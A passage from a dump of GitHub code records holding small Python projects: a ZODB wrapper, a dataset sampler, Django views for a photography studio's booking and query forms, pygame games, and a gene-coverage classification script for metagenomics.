value\r\n","repo_name":"fun-with-compilers/fwc_tiny_basic_line_interpreter","sub_path":"tiny_basic/vm/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42708757854","text":"# Import the ZODB and transaction libraries\nfrom ZODB import FileStorage, DB\nfrom ZEO import ClientStorage\nimport transaction\n\nclass MiZODB(object):\n    ''' Database '''\n    def __init__(self, addr):\n        ''' Opens a database '''\n        # Option using FileStorage\n        #self.storage = FileStorage.FileStorage(addr)\n        ## Option using ClientStorage - client-server mode ##\n        self.storage = ClientStorage.ClientStorage(addr, cache_size=1000)\n        self.db = DB(self.storage, cache_size=1000)\n        self.conexion = self.db.open()\n        self.raiz = self.conexion.root()\n\n    def close(self):\n        ''' Closes the database '''\n        self.conexion.close()\n        self.db.close()\n        
self.storage.close()","repo_name":"danicaceres1998/ProSoft","sub_path":"Persistencia/mizodb.py","file_name":"mizodb.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41035682919","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 12 01:44:09 2019\r\n\r\n@author: yiyuezhuo\r\n\"\"\"\r\n\r\n'''\r\n4,5,6 \r\n-> \r\n4_train, 5_train, 6_train, \r\n4_train_anno,5_train_anno,6_train_anno \r\n'''\r\n\r\nimport os\r\nimport random\r\nimport shutil\r\n\r\nrandom.seed(8964)\r\n\r\nconfig = {\r\n '4': 60,\r\n '5': 60,\r\n '6': 60\r\n}\r\n\r\nfor root, num_sample in config.items():\r\n name_list = os.listdir(root)\r\n root_train = root+'_train'\r\n os.makedirs(root_train, exist_ok=True)\r\n os.makedirs(root_train+'_anno',exist_ok=True)\r\n random.shuffle(name_list)\r\n name_list_sampled = name_list[:num_sample]\r\n for name in name_list_sampled:\r\n ori_path = os.path.join(root, name)\r\n tar_path = os.path.join(root_train, name)\r\n shutil.copy(ori_path, tar_path)\r\n print('Copy {} -> {}'.format(ori_path, tar_path))\r\n \r\n \r\n ","repo_name":"yiyuezhuo/drone-tracking","sub_path":"videos_frames/sample_labelImg_dataset.py","file_name":"sample_labelImg_dataset.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24641641911","text":"from django.http import HttpResponse, request\nfrom django.shortcuts import render, redirect\nfrom django.core.mail import BadHeaderError, send_mail, EmailMultiAlternatives\nfrom django.conf import settings \nfrom .models import Appointments, Queries\nfrom socket import gaierror, timeout\nfrom django.contrib import messages\n\n# Create your views here.\ndef index(request):\n if (request.method == \"POST\"):\n userName = request.POST[\"Name\"]\n userEmail = request.POST[\"Email\"]\n userPhno = request.POST[\"ContactNum\"]\n userMsg = request.POST[\"userQuery\"]\n body = f\"\"\"

Name: {userName}


Phone no: {userPhno}


Query:

{userMsg}

\"\"\"\n subj = \"Query\"\n msg, status = send_email(subj, userEmail, body)\n #print(userName,\" \",userMsg,\" \",userPhno,\" \",userEmail)\n params = {'responce':msg, 'status':status}\n if (status==\"success\"):\n data = Queries.objects.create(\n User_Name= userName,\n User_Email= userEmail,\n User_Contact= userPhno,\n User_Discription= userMsg)\n data.save()\n return render(request, 'index.html', params)\n else:\n params = {}\n return render(request, 'index.html', params)\n\ndef base(request):\n return render(request, 'base.html')\n\ndef bookings(request):\n if (request.method == \"POST\"):\n userFirstName = request.POST[\"CFirstName\"]\n userLastName = request.POST[\"CLastName\"]\n userEmail = request.POST[\"cEmail\"]\n userContact = request.POST[\"cContactNo\"]\n BookingDate = request.POST[\"BookedOn\"]\n apptDate = request.POST[\"apptDate\"]\n userEvent = request.POST[\"cEvent\"]\n userMsg = request.POST[\"cMessage\"]\n\n body = f\"\"\"

User Name: {userFirstName} {userLastName}
User Email: {userEmail}
Phone No: {userContact}
Booked on: {BookingDate}
Appointment Date: {apptDate}
For: {userEvent}


Message: {userMsg}

\"\"\"\n\n subj = \"Regards Booking Appointment\"\n msg, status = send_email(subj, userEmail, body)\n params = {'responce':msg, 'status':status}\n if (status==\"success\"):\n Adata = Appointments.objects.create(User_FirstName=userFirstName,\n User_LastName= userLastName,\n User_Email= userEmail,\n User_Contact= userContact,\n User_BookedOn= BookingDate,\n User_ApptDate= apptDate,\n User_Event= userEvent,\n User_Suggestion= userMsg)\n print(status)\n Adata.save()\n print(status)\n return render(request, 'book.html', params)\n else:\n params = {}\n return render(request, 'book.html', params)\n\ndef send_email(subject, Uemail, body):\n text_content = \"A mail from UkPhotography user\"\n html_content = f'{body}'\n from_mail = settings.EMAIL_HOST_USER\n msg = EmailMultiAlternatives(subject, text_content, from_mail, ['ukphotography2002@gmail.com'], reply_to=[Uemail,])\n msg.attach_alternative(html_content, \"text/html\")\n try:\n msg.send()\n except BadHeaderError:\n Msg = \"Invalid header found\"\n status = \"error\"\n return(Msg, status)\n except (gaierror, timeout):\n Msg = \"SORRY!
Check your internet connection or try again after some time\"\n        status = \"error\"\n        return(Msg, status)\n    Msg = \"Thank you for getting in touch!
We will get back in touch with you soon!
Have a great day!\"\n status = \"success\"\n return(Msg, status)","repo_name":"LalitNath1221/pUkStudio","sub_path":"PhotoStudio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"33132247716","text":"#!/usr/bin/env python3\n\n\"\"\"\nSelectPlayer handler module\n\"\"\"\n\nimport pygame\nfrom helik.modes.standard import Mode\nfrom helik.htypes import BoardType, GameMode\nfrom helik.game.player import Player\nfrom helik.hdefs import ARENA_WIDTH, ARENA_HEIGHT\n\n\nclass SelectPlayer(Mode):\n \"\"\"\n SelectPlayer handler class\n \"\"\"\n def __init__(self, parent):\n \"\"\"\n Class constructor\n \"\"\"\n super().__init__(parent)\n self.viewpos = 0\n self.rects = []\n self.view_x = 0\n self.view_y = 0\n self.vehicles = [self.images[\"vehicles\"][0],\n self.images[\"vehicles\"][2],\n self.images[\"vehicles\"][4]]\n x = ARENA_WIDTH // 4\n for image in self.vehicles:\n r = image.get_rect()\n r.center = (x, ARENA_HEIGHT // 2)\n x += ARENA_WIDTH // 4\n self.rects.append(r)\n\n def on_paint(self):\n \"\"\"\n Paint event handler\n \"\"\"\n self.buffer.blit(self.res_man.images[\"default-background\"], (0, 0))\n for i in range(len(self.rects)):\n self.buffer.blit(self.vehicles[i], self.rects[i])\n r = self.images[\"viewport\"].get_rect()\n r.center = ((self.viewpos + 1) * ARENA_WIDTH // 4, ARENA_HEIGHT // 2)\n self.buffer.blit(self.images[\"viewport\"], r)\n\n def on_keyup(self, key):\n \"\"\"\n Key release event handler\n :param key: key code\n \"\"\"\n if key == pygame.K_LEFT:\n if self.viewpos > 0:\n self.viewpos -= 1\n self.audio.play_sound(\"arrow\")\n elif key == pygame.K_RIGHT:\n if self.viewpos < len(self.images[\"vehicles\"]) - 1:\n self.viewpos += 1\n self.audio.play_sound(\"arrow\")\n elif key == pygame.K_RETURN:\n self.game.player = Player(self.game, self.viewpos)\n self.game.change_mode(GameMode.PREPARE)\n elif key == pygame.K_ESCAPE:\n self.arena.change_board(BoardType.MENU)\n elif key == pygame.K_q:\n self.arena.change_board(BoardType.MENU)\n","repo_name":"lvajxi03/helik","sub_path":"pysrc/helik/modes/selectplayer.py","file_name":"selectplayer.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12138457296","text":"# -*- coding: utf-8\n# pylint: disable=line-too-long\nimport csv\nimport numpy as np\nimport sys\nimport os\nimport anvio.utils as utils\n\n\n\ndef get_data_from_txt_file(file_name):\n data_list = list(csv.reader(open(file_name), delimiter='\\t'))\n Nsamples = len(data_list[0]) - 1\n Ngenes = len(data_list) - 1\n\n sample_name_dictionary = {}\n for i in range(0,Nsamples):\n sample_name_dictionary[i] = data_list[0][i+1]\n\n gene_callers_id_dictionary = {}\n for i in range(0,Ngenes):\n gene_callers_id_dictionary[i] = data_list[i+1][0]\n\n data = np.loadtxt(file_name, delimiter='\\t', skiprows=1, usecols=range(1, Nsamples + 1))\n return(data, sample_name_dictionary, gene_callers_id_dictionary)\n\n\ndef get_positive_samples(data,alpha=0.05,beta=0.5):\n # Identify samples that contain your organism of interest (from here on: positive samples):\n # input:\n # data - data matrix\n # alpha - cutoff for gene detection (portion of median value)\n # beta - cutoff for positive sample (portion of detected genes)\n # output:\n # positive_samples_list - list of positive samples\n\n gene_detection_matrix = np.zeros_like(data)\n Ngenes = len(data)\n 
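# a sample counts as positive when its number of detected genes exceeds beta * Ngenes\n    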
positive_samples_list = []\n    for sample_number in range(len(data[0])):\n        # getting the median of the non-zero coverage values for each sample\n        median_value = np.median(data[np.nonzero(data[:,sample_number]),sample_number])\n        gene_detection_matrix[:,sample_number] = data[:, sample_number] > alpha * median_value\n        print('sample %s max detection: real max: '% (sample_number))\n        print(data[np.nonzero(gene_detection_matrix[:,sample_number]),sample_number][0])\n        print(max(data[np.nonzero(gene_detection_matrix[:,sample_number])][0]))\n        print(max(data[:,sample_number]))\n        if sum(gene_detection_matrix[:,sample_number]) > beta * Ngenes:\n            positive_samples_list.append(sample_number)\n    return positive_samples_list, gene_detection_matrix\n\n\ndef alternative_algorithm(data, alpha=0.5, beta=1):\n    Ns = len(data[0])\n    Ngenes = len(data)\n    # Initialize list of TS (Taxon Specific genes)\n    taxon_specific_genes = range(Ngenes)\n    # Initialize list of positive/negative samples\n    sample_detection = np.ones(Ns)\n    converged = False\n    loss = None\n    while not converged:\n        # mean of coverage of all TS genes in each sample\n        mean = np.mean(data[taxon_specific_genes, :], axis=0) # calculating the mean along the columns\n\n        # determining the detection of the Genome in each sample\n        detection_portion = sum(np.abs(np.abs(data[taxon_specific_genes, :]-mean)-3*np.sqrt(np.var(data[\n            taxon_specific_genes, :],axis=0))))\n        for sample in range(Ns):\n            if detection_portion[sample] >= alpha * Ngenes:\n                sample_detection[sample] = 1\n            else:\n                sample_detection[sample] = 0\n\n        # calculate adjusted variance of each gene (adjusted variance is just a name I made-up for this term)\n        positive_samples = np.nonzero(sample_detection)[0]\n        v = np.var(data[:, positive_samples] / mean[positive_samples], axis=1)\n\n        # classifying genes (TS or NTS)\n        taxon_specific_genes = []\n        for gene_id in range(Ngenes):\n            if v[gene_id] <= beta:\n                taxon_specific_genes.append(gene_id)\n\n        # calculating the loss function\n        number_of_NTS = Ngenes - len(taxon_specific_genes)\n        new_loss = beta * number_of_NTS + sum(v[taxon_specific_genes])\n\n        # Check convergence\n        if loss is not None:\n            if new_loss >= loss:\n                converged = True\n        loss = new_loss\n\n    return taxon_specific_genes, positive_samples\n\ndef get_taxon_specific_candidates(data, positive_samples_list, gene_detection_matrix, gamma=10):\n    # Find the taxon specific candidate genes in each sample\n    # input:\n    #   data - data matrix\n    #   positive_samples_list - list of positive samples\n    # output:\n    #   taxon_specific_candidates_matrix - a matrix in which for each gene there are 1's in samples in which it is\n    #   identified as a taxon specific candidate and 0 otherwise\n\n    Ngenes = len(data)\n    taxon_specific_candidates_matrix = np.zeros_like(data, dtype=bool)\n\n    for sample_number in positive_samples_list:\n        converged = False\n\n        # approximation of the median value (only of detected genes):\n        detected_genes = np.nonzero(gene_detection_matrix[:,sample_number])\n        median_coverage_index = np.argsort(data[detected_genes, sample_number][0])[detected_genes[0][len(\n            detected_genes[0])//2]]\n        print('this: %s' % detected_genes[0][len(\n            detected_genes[0])//2])\n        print(data[detected_genes, sample_number][0])\n        print(np.argsort(data[detected_genes, sample_number][0]))\n        median_coverage = data[median_coverage_index, sample_number]\n        sorted_indexes = np.argsort(np.absolute(data[:, sample_number] - median_coverage))\n        print('sample number %s, the median value is %s in index number %s' % (sample_number, 
median_coverage, median_coverage_index))\n print('the sorted indexes: %s' % sorted_indexes)\n var = 0\n mean = median_coverage\n cluster = {'gene_ids': [median_coverage_index], 'gene_coverages': [median_coverage]}\n gene_number = 1\n while not converged and gene_number < Ngenes:\n new_gene_number = sorted_indexes[gene_number]\n new_gene_coverage = data[new_gene_number, sample_number]\n if var == 0:\n cutoff = 0.1 * mean\n else:\n cutoff = max(gamma * np.sqrt(var), 0.1 * mean)\n if abs(mean - new_gene_coverage) > cutoff:\n converged = True\n else:\n cluster['gene_ids'].append(new_gene_number)\n cluster['gene_coverages'].append(new_gene_coverage)\n # updating the new mean\n new_mean = (mean * gene_number + new_gene_coverage) / (gene_number + 1)\n # updating the new variance\n var = (gene_number * var + (new_gene_coverage - new_mean) * (new_gene_coverage - mean)) / (gene_number + 1)\n mean = new_mean\n gene_number += 1\n # setting the value of the genes in the cluster as 1\n taxon_specific_candidates_matrix[cluster['gene_ids'], sample_number] = True\n # print(adfasdf)\n return taxon_specific_candidates_matrix\n\n\ndef get_taxon_specific_labels_from_taxon_specific_candidates_matrix(taxon_specific_candidates_matrix,\n gene_detection_matrix, eta=0.8):\n # Decide which genes are taxon specific according to a majority vote\n # input:\n # taxon_specific_candidates_matrix\n # output:\n # taxon_specific_labels - dictionary with gene_callers_id as keys and values of 'TS' for Taxon-Specific and\n # 'NTS' for Non Taxon-Specific\n Ngenes = len(taxon_specific_candidates_matrix)\n taxon_specific_genes = []\n for gene_number in range(Ngenes):\n print('gene %s is detected in %s samples and TS in %s samples, and overlap in %s samples' % (gene_number,\n sum(gene_detection_matrix[gene_number,:]),sum(taxon_specific_candidates_matrix[gene_number,:]), sum(np.multiply(\n taxon_specific_candidates_matrix[gene_number,:],gene_detection_matrix[gene_number,:]))))\n if sum(np.multiply(taxon_specific_candidates_matrix[gene_number,:],gene_detection_matrix[gene_number,\n :])) / sum(gene_detection_matrix[\n gene_number,:]) > eta:\n taxon_specific_genes.append(gene_number)\n return taxon_specific_genes\n\n\ndef get_accessory_genes(data, taxon_specific_genes, positive_samples, a=3):\n Ngenes = len(data)\n Ns = len(data[0])\n # indices of the sub-matrix containing all Taxon-specific genes only in positive samples:\n # calculating the mean of the taxon specific genes in each positive sample\n gene_detection = np.zeros((Ngenes, Ns), dtype=bool)\n for sample in positive_samples:\n mean_of_TS_coverage = np.mean(data[taxon_specific_genes, sample])\n std_of_TS_coverage = np.std(data[taxon_specific_genes, sample])\n print('sample number %s, mean is %s, std is %s' % (sample, mean_of_TS_coverage, std_of_TS_coverage))\n # if the gene coverage is more than 'a' times the std smaller than average then it is considered to be not\n # detected (or disconnected) from the sample\n # gene_detection[:, sample] = data[:, sample] - mean_of_TS_coverage > -a * std_of_TS_coverage\n gene_detection[:, sample] = np.logical_and(data[:, sample] - mean_of_TS_coverage > -a * std_of_TS_coverage,\n data[:,sample] > 0)\n print(np.sum(gene_detection[:,sample]))\n\n # array showing in how many samples the gene is detected\n gene_detection_layer = np.sum(gene_detection,axis=1)\n\n accessory_genes = np.zeros(Ngenes)\n for gene_id in range(Ngenes):\n if gene_detection_layer[gene_id] > 0.9 * len(positive_samples):\n accessory_genes[gene_id] = 0\n else:\n 
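# detected in fewer than 90% of positive samples -> marked as accessory\n            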
accessory_genes[gene_id] = 1\n\n return gene_detection_layer, accessory_genes\n\n\ndef get_gene_classes_dictionary(taxon_specific_dictionary, accessory_genes, gene_callers_id_dictionary):\n from gen_mock_data import gene_class_id_dictionary_reverese\n gene_classes_dictionary = {}\n for gene_id in gene_callers_id_dictionary.keys():\n if taxon_specific_dictionary[gene_callers_id_dictionary[gene_id]] == 'TS' and accessory_genes[gene_id] == 0:\n # Taxon specific core\n gene_classes_dictionary[gene_callers_id_dictionary[gene_id]] = gene_class_id_dictionary_reverese[1]\n elif taxon_specific_dictionary[gene_callers_id_dictionary[gene_id]] == 'TS' and accessory_genes[gene_id] == 1:\n # Taxon specific accessory\n gene_classes_dictionary[gene_callers_id_dictionary[gene_id]] = gene_class_id_dictionary_reverese[3]\n elif taxon_specific_dictionary[gene_callers_id_dictionary[gene_id]] == 'NTS' and accessory_genes[gene_id] == 0:\n # Non taxon specific core\n gene_classes_dictionary[gene_callers_id_dictionary[gene_id]] = gene_class_id_dictionary_reverese[4]\n elif taxon_specific_dictionary[gene_callers_id_dictionary[gene_id]] == 'NTS' and accessory_genes[gene_id] == 1:\n # Non taxon specific accessory\n gene_classes_dictionary[gene_callers_id_dictionary[gene_id]] = gene_class_id_dictionary_reverese[5]\n\n return gene_classes_dictionary\n\n\ndef gen_taxon_specific_dictionary_from_list(taxon_specific_genes,gene_callers_id_dictionary):\n taxon_specific_dictionary = dict(zip(gene_callers_id_dictionary.values(),['NTS'] * len(\n gene_callers_id_dictionary)))\n print(gene_callers_id_dictionary)\n for gene_id in taxon_specific_genes:\n taxon_specific_dictionary[gene_callers_id_dictionary[gene_id]] = 'TS'\n return taxon_specific_dictionary\n\n\ndef save_tabular_to_txt(dictionary, new_txt_output, first_column_title, additional_columns_title,\n old_txt=None):\n if old_txt is None:\n with open(new_txt_output, 'w') as txt_file:\n writer = csv.writer(txt_file, delimiter='\\t')\n # writing the title row\n first_row = [first_column_title] + additional_columns_title\n writer.writerow(first_row)\n for key, value in dictionary.items():\n writer.writerow([key, value])\n else:\n with open(old_txt, 'r') as old_file:\n reader = csv.reader(old_file, delimiter='\\t')\n with open(new_txt_output, 'w') as txt_file:\n writer = csv.writer(txt_file, delimiter='\\t')\n first_row = list(next(reader)) + additional_columns_title\n writer.writerow(first_row)\n for row in reader:\n print(row + [dictionary[row[0]]])\n writer.writerow(row + [dictionary[row[0]]])\n\n\ndef save_taxon_specific_labels_to_txt(taxon_specific_dictionary, txt_output, additional_layers_txt=None):\n save_tabular_to_txt(dictionary=taxon_specific_dictionary,new_txt_output=txt_output,\n first_column_title='gene_callers_id',additional_columns_title=['taxon_specific_label'],\n old_txt=additional_layers_txt)\n\n\ndef get_samples_detection_dictionay(positive_samples_list, sample_name_dictionary):\n samples_detection_dictionay = {}\n for sample in sample_name_dictionary:\n if sample in positive_samples_list:\n samples_detection_dictionay[sample_name_dictionary[sample]] = 'P'\n else:\n samples_detection_dictionay[sample_name_dictionary[sample]] = 'N'\n return samples_detection_dictionay\n\ndef get_negative_samples(positive_samples_list,sample_name_dictionary):\n negative_samples = list(set(sample_name_dictionary.keys()) - set(positive_samples_list))\n return negative_samples\n\n\ndef save_sample_detection_information_to_sample_information_file(positive_samples_list, 
sample_name_dictionary,\n txt_output, sample_information_txt=None):\n samples_detection_dictionay = get_samples_detection_dictionay(positive_samples_list, sample_name_dictionary)\n save_tabular_to_txt(dictionary=samples_detection_dictionay, new_txt_output=txt_output,\n first_column_title='samples', additional_columns_title=['detection_of_genome'],\n old_txt=sample_information_txt)\n\n\ndef tests():\n # input_name = 'test_200'\n input_name = 'p214_Bfrag_positive_with_M_GG_gene_coverage'\n input_data = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + '.txt'\n data, sample_name_dictionary, gene_callers_id_dictionary = get_data_from_txt_file(input_data)\n print(data.shape)\n # get the positive samples\n positive_samples_list , gene_detection_matrix = get_positive_samples(data)\n print('The number of positive samples is %s'%len(positive_samples_list))\n negative_samples = get_negative_samples(positive_samples_list,sample_name_dictionary)\n print('The following samples are negative: %s' % ([sample_name_dictionary[key] for key in negative_samples]))\n # testing get_taxon_specific_candidates\n taxon_specific_candidates_matrix = get_taxon_specific_candidates(data, positive_samples_list, gene_detection_matrix)\n print(len(taxon_specific_candidates_matrix))\n print(len(np.nonzero(taxon_specific_candidates_matrix)[0]))\n\n # testing get_taxon_specific_labels_from_taxon_specific_candidates_matrix\n taxon_specific_genes = get_taxon_specific_labels_from_taxon_specific_candidates_matrix(\n taxon_specific_candidates_matrix, gene_detection_matrix, eta=0.8)\n print('The number of taxon specific genes is: %s ' % len(taxon_specific_genes))\n\n # save the results\n taxon_specific_dictionary = gen_taxon_specific_dictionary_from_list(taxon_specific_genes,\n gene_callers_id_dictionary)\n txt_output = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + '_taxon_specific_genes.txt'\n additional_layers_txt = None # '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/test_additional_layers.txt'\n save_taxon_specific_labels_to_txt(taxon_specific_dictionary, txt_output, additional_layers_txt)\n\n sample_information_txt = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + \\\n '_sample_information.txt'\n old_sample_information = None\n save_sample_detection_information_to_sample_information_file(positive_samples_list, sample_name_dictionary,\n sample_information_txt,old_sample_information)\n\n # test get_accessory_genes(data, taxon_specific_genes, positive_samples)\n gene_detection_layer, accessory_genes = get_accessory_genes(data, taxon_specific_genes, positive_samples_list)\n\n # get_gene_classes\n gene_classes_dictionary = get_gene_classes_dictionary(taxon_specific_dictionary, accessory_genes, gene_callers_id_dictionary)\n txt_output = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + '_additional_layers.txt'\n additional_layers_txt = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + '_taxon_specific_genes.txt'\n save_tabular_to_txt(gene_classes_dictionary, txt_output, 'gene_callers_id', ['gene_class'], additional_layers_txt)\n\n # save_\n\n # # running the alternative algorithm\n # taxon_specific_genes_alt, positive_samples_list_alt = alternative_algorithm(data, alpha=0.5, beta=1)\n #\n # # save the results\n # taxon_specific_dictionary_alt = gen_taxon_specific_dictionary_from_list(taxon_specific_genes_alt,\n # gene_callers_id_dictionary)\n # print(taxon_specific_dictionary_alt)\n # txt_output = 
'/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + '_taxon_specific_genes_alt.txt'\n    # additional_layers_txt = None\n    # save_taxon_specific_labels_to_txt(taxon_specific_dictionary_alt, txt_output, additional_layers_txt)\n    #\n    # sample_information_txt = '/Users/alonshaiber/PycharmProjects/MACg/tests/sandbox/' + input_name + \\\n    #                          '_sample_information_alt.txt'\n    # old_sample_information = None\n    # save_sample_detection_information_to_sample_information_file(positive_samples_list_alt, sample_name_dictionary,\n    #                                                               sample_information_txt,old_sample_information)\n\n\nif __name__ == '__main__':\n    tests()","repo_name":"ShaiberAlon/MACg","sub_path":"MACg/get_taxon_specific_genes_from_matrix.py","file_name":"get_taxon_specific_genes_from_matrix.py","file_ext":"py","file_size_in_byte":18150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23839954609","text":"import random\n\nuser_score = 0\ncomputer_score = 0\n\noptions = [\"rock\", \"paper\", \"scissors\"]\n\nwhile True:\n    user_input = input(\"Type Rock/Paper/Scissors or Q to quit: \").lower()\n    if user_input == \"q\":\n        # leave the loop so the final score summary still prints\n        break\n\n    if user_input not in options:\n        print(\"Please try again. \")\n        continue\n    \n    random_number = random.randint(0, 2)\n\n    # 0:rock, 1:paper and 2:scissors\n\n    computer_hand = options[random_number]\n    print(\"Computer picked\", computer_hand + \".\")\n\n    if user_input == \"rock\" and computer_hand == \"scissors\":\n        print(\"You won!\")\n        user_score += 1\n        continue\n\n    elif user_input == \"paper\" and computer_hand == \"rock\":\n        print(\"You won!\")\n        user_score += 1\n        continue\n\n    elif user_input == \"scissors\" and computer_hand == \"paper\":\n        print(\"You won!\")\n        user_score += 1\n        continue\n\n    else:\n        print(\"You lost!\")\n        computer_score += 1\n\n    \nprint(\"You won\", user_score, \"times!\")\nprint(\"The computer won\", computer_score, \"times\")\nprint(\"Goodbye\")\n\n\n\n","repo_name":"christoperipper/my_first_python_programme","sub_path":"rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35027043272","text":"# create the game \"Maze\"!\r\nfrom pygame import *\r\ngame = True\r\nfinish = False\r\nwin_width = 700\r\nwin_height = 500\r\nclass GameSprite(sprite.Sprite):\r\n    def __init__(self, player_image, player_x, player_y, player_speed):\r\n        super().__init__()\r\n        self.image = transform.scale(image.load(player_image), (65, 65))\r\n        self.speed = player_speed\r\n        self.rect = self.image.get_rect()\r\n        self.rect.x = player_x\r\n        self.rect.y = player_y\r\n    def reset(self):\r\n        window.blit(self.image, (self.rect.x, self.rect.y))\r\nclass Player(GameSprite):\r\n    def update(self):\r\n        keys = key.get_pressed()\r\n        if keys[K_a] and self.rect.x > 5:\r\n            self.rect.x -= self.speed\r\n        if keys[K_d] and self.rect.x < win_width - 65:\r\n            self.rect.x += self.speed\r\n        if keys[K_w] and self.rect.y > 5:\r\n            self.rect.y -= self.speed\r\n        if keys[K_s] and self.rect.y < win_height - 65:\r\n            self.rect.y += self.speed\r\nclass Enemy(GameSprite):\r\n    def __init__(self, player_image, player_x, player_y, player_speed, lg, rg):\r\n        super().__init__(player_image, player_x, player_y, player_speed)\r\n        self.direction = 'right'\r\n        self.lg = lg\r\n        self.rg = rg\r\n    def update(self):\r\n        self.rect.x +=1\r\n        x1 = 500\r\n        x2 = 635\r\n        if self.rect.x <= self.lg:\r\n            self.direction = \"right\"\r\n        if self.rect.x >= 
self.rg: \r\n self.direction = 'left'\r\n if self.direction == 'left':\r\n self.rect.x -= 4\r\n if self.direction == 'right':\r\n self.rect.x += 2 \r\nclass Wall(sprite.Sprite):\r\n def __init__(self, color_1, color_2, color_3, wall_x, wall_y, wall_width, wall_height):\r\n super().__init__()\r\n self.color_1 = color_1\r\n self.color_2 = color_2\r\n self.color_3 = color_3\r\n self.width= wall_width\r\n self.height = wall_height\r\n self.image = Surface((self.width, self.height))\r\n self.image.fill((color_1, color_2, color_3))\r\n self.rect = self.image.get_rect()\r\n self.rect.x = wall_x\r\n self.rect.y = wall_y\r\n def draw_wall(self):\r\n window.blit(self.image, (self.rect.x, self.rect.y))\r\n\r\n\r\nclock = time.Clock()\r\nFPS = 60\r\nwindow = display.set_mode((win_width, win_height))\r\ndisplay.set_caption(\"Maze\")\r\ntreasure = GameSprite(\"treasure.png\", 635, 435, 0)\r\nplayer = Player(\"hero.png\", 0, 0, 5)\r\nkakashka_zlaya = Enemy(\"cyborg.png\", 500, 320, 3, 460, 635)\r\nkaka_zlaya_iz_raya = Enemy(\"cyborg.png\", 240, 10, 0, 240, 635)\r\nkaka = Enemy('cyborg.png', 625, 120, 0, 460, 625)\r\nwall_1 = Wall(115, 252, 3, 100, 0, 10, 400)\r\nwall_2 = Wall(115, 252, 3, 230, 0, 10, 80)\r\nwall_3 = Wall(115, 252, 3, 200, 80, 100, 10)\r\nwall_4 = Wall(115, 252, 3, 230, 200, 10, 520)\r\nwall_5 = Wall(115, 252, 3, 200, 200, 250, 10)\r\nwall_6 = Wall(115, 252, 3, 440, 90, 10, 110)\r\nwall_7 = Wall(115, 252, 3, 440, 90, 150, 10)\r\nwall_8 = Wall(115, 252, 3, 590, 90, 10, 500)\r\nwall_9 = Wall(115, 252, 3, 100, 400, 50, 10)\r\nmixer.init()\r\nfont.init()\r\nfont = font.SysFont(\"Arial\", 36)\r\nwinfont = font.render('YOU WIN!', True, (255, 215, 0)) # выигрыш \r\nlose = font.render(\"YOU LOSE\", True, (255, 0, 0))\r\nmixer.music.load('jungles.ogg')\r\nmixer.music.play()\r\nkick = mixer.Sound('kick.ogg')\r\nwin = mixer.Sound('money.ogg')\r\nbackground = transform.scale(image.load(\"background.jpg\"), (700, 500))\r\nwhile game:\r\n for e in event.get():\r\n if e.type == QUIT:\r\n game = False\r\n\r\n if not finish:\r\n window.blit(background, (0, 0))\r\n treasure.reset()\r\n player.reset()\r\n player.update()\r\n kakashka_zlaya.reset()\r\n kakashka_zlaya.update()\r\n kaka_zlaya_iz_raya.reset()\r\n kaka_zlaya_iz_raya.update()\r\n kaka.reset()\r\n kaka.update()\r\n wall_1.draw_wall()\r\n wall_2.draw_wall()\r\n wall_3.draw_wall()\r\n wall_4.draw_wall()\r\n wall_5.draw_wall()\r\n wall_6.draw_wall()\r\n wall_7.draw_wall()\r\n wall_8.draw_wall()\r\n wall_9.draw_wall()\r\n if sprite.collide_rect(player, kaka_zlaya_iz_raya) or sprite.collide_rect(player, kakashka_zlaya) or sprite.collide_rect(player, wall_1) or sprite.collide_rect(player, wall_2) or sprite.collide_rect(player, wall_3) or sprite.collide_rect(player, wall_4) or sprite.collide_rect(player, wall_5) or sprite.collide_rect(player, wall_6) or sprite.collide_rect(player, wall_7) or sprite.collide_rect(player, wall_8) or sprite.collide_rect(player, wall_9) or sprite.collide_rect(player, kaka):\r\n #game = False\r\n kick.play()\r\n window.blit(lose, (250, 250))\r\n finish = True\r\n if sprite.collide_rect(player, treasure):\r\n win.play\r\n window.blit(winfont, (250, 250))\r\n finish = True\r\n\r\n\r\n\r\n\r\n clock.tick(FPS)\r\n display.update()","repo_name":"YarRumS/Maze","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40629982351","text":"import logging\n\nlog = logging.getLogger( __name__ )\n\nfrom 
